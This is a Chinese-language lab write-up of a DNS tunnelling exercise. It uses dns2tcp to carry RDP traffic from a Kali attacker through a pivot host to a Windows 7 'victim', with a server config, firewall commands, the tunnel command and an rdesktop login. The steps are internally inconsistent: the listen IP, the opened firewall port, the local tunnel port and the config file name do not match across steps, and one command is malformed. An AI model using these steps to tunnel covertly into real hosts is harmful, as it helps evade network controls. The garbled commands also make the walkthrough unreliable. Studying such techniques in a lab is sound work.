Antech 2020-05-16
DNS隧道实验
攻击机:kali (192.168.50.14)
跳板机:KyLin (192.168.50.12 ens33)
? (192.168.136.147 ens37)
受害机:win7 (192.168.136.152)
因为本实验环境在内网,不存在DNS服务器,所以需要自己利用跳板机架设一台DNS服务器。DNS隧道是将tcp协议数据封装在dns协议中,在进行DNS查询时,如果查询的域名不在DNS服务器本机的缓存中,就会访问互联网进行查询,然后返回结果。我们的跳板机就是这样一个互联网定制的DNS服务器,依靠DNS协议进行数据包的交换。从DNS协议角度看,此操作为查询某个特定域名并得到解析的结果,预期返回结果应该是一个IP地址,而事实上——返回的结果可以是任意字符串,包括加密的C&C指令。
使用工具:dns2tcpc, dns2tcpd, dns2tcpd.conf, ptunnel
安装好dns2tcp后,打开配置文件 /etc/dns2tcpd.conf , 将内容改为:
listen = 192.168.50.14 #指定服务建立地址
port =53 #指定监听端口
user =nobody
chroot =/tmp
domain = jsb.jts #设置域名
resource = rdp:192.168.136.152:3389,ssh:127.0.0.1:22, smtp:127.0.0.1:25
此为我伪造云服务器公网IP
2)在麒麟跳板机上以root用户启动服务(在dns2tcpd.conf所在文件夹执行此命令)
su -root 变为root用户
dns2tcpd -f dns2tcp.conf -F -d 2 #添加-F选项,是程序在前台运行
启动服务后,将在指定地址和端口上开启服务
netstat -ulnp | grep : 53
udp 0 0 192.168.50.14:53 0.0.0.0:*
KyLin默认开启防火墙,需要配置开启53端口。(方法同上,进入root用户模式)
firewall-cmd --permanent --add-service=dns
firewall-cmd --permanent --list-services
firewall-cmd --permanent --add-port=1000/udp
firewall-cmd --permanent --list-ports
firewall-cmd --reload
在kali上建立隧道
dns2tcpc -z jsb.jts -r rdp -l 1006 192.168.50.14(kali IP地址)
再打开一个终端页面,远程登陆受害机win7
rdesktop 127.0.0.1:1005